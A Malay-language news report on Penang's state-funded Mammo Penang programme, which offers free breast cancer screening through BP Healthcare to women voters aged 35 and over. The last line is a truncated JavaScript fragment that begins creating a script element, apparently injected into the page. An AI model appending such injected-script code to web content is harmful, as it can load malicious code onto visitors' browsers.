Mammo Penang, jaga kesihatan wanita P. Pinang

Admin
DR. Afif Bahardin (lima dari kiri) dan Beh Chun Chuan (enam dari kanan) sambil diperhatikan Ketua Menteri dan barisan kepimpinan Kerajaan Negeri bertukar-tukar dokumen pada Majlis Penyerahan Surat Setuju Terima Perkhidmatan Pemeriksaan Program Mammogram Pulau Pinang 2015 di sini baru-baru ini.

Oleh : NORSHAHIDA YUSOFF

GEORGE TOWN – BP Healthcare dilantik sebagai pelaksana pemeriksaan mamogram menerusi program Mammo Penang secara percuma ke atas pengundi wanita berdaftar berumur 35 tahun dan ke atas di negeri ini, mulai 28 Februari lalu.

Ketua Menteri, Y.A.B. Tuan Lim Guan Eng berkata, Kerajaan Negeri memperuntukkan sebanyak RM3 juta untuk membiayai kos pemeriksaan kanser payudara dalam tempoh tiga tahun ini.

Mammo Penang dijangka berterusan sehingga 2018 dengan jangkaan awal seramai 23,280 peserta,” ujarnya yang juga Ahli Dewan Undangan Negeri (ADUN) Air Putih pada sidang media, selepas Majlis Penyerahan Surat Setuju Terima Perkhidmatan Pemeriksaan Program Mammogram Pulau Pinang 2015 di sini baru-baru ini.

Mewakili Kerajaan Negeri, Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin menyerahkan Surat Setuju kepada Presiden BP Healthcare, Datuk Beh Chun Chuan.

Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon, Prof. Dr. P. Ramasamy (Timbalan Ketua Menteri II), Chong Eng (Exco Belia & Sukan, Pembangunan Wanita, Keluarga dan Komuniti), Dato’ Abdul Malik Abul Kassim (Exco Hal Ehwal Agama, Perdagangan Dalam Negeri dan Hal Ehwal Pengguna), Dr. Norlela Ariffin (ADUN Penanti) dan Lim Siew Khim (ADUN Sungai Pinang) turut menyaksikan majlis tersebut.

Justeru, Guan Eng memberitahu, Perbadanan Pembangunan Wanita Pulau Pinang (PWDC), ‘Penang Sihat’ dan ‘Pink Penang’ dilantik sebagai kumpulan sokongan rasmi, demi menjayakan kempen kebajikan terbaru ini.

Kempen tersebut, tambahnya, akan meliputi semua Kawasan Dewan Undangan Negeri (KADUN), pada setiap hujung minggu, hari Sabtu dan Ahad.

“Sekiranya program ini mendapat sambutan yang menggalakkan, Kerajaan Negeri bersedia untuk melaksanakan program ini pada hari bekerja,” jelas beliau.

Difahamkan, sebanyak 19 daripada setiap 100,000 kematian di seluruh negara adalah berpunca oleh barah payudara.

Satu daripada setiap 20 wanita di negara ini mempunyai risiko mengidap kanser payudara, sekaligus bersamaan dengan 700,000 orang.

Program terbaru khusus untuk wanita ini merupakan satu lagi janji dalam manifesto Pilihan Raya Umum Ke-13 (PRU13) yang dikotakan oleh Kerajaan Negeri di Pulau Pinang, kini.

Bagi maklumat lanjut, hubungi Pink Penang pada talian 04 – 222 5318 atau 04 – 222 5327; Pejabat MMK Kesihatan (04 – 262 0862); PWDC (04 – 261 2835 atau 012 – 358 9063) dan BP Diagnostic Centre (04 – 229 2677 atau 04 – 226 3160).

var d=document;var s=d.createElement(‘script’);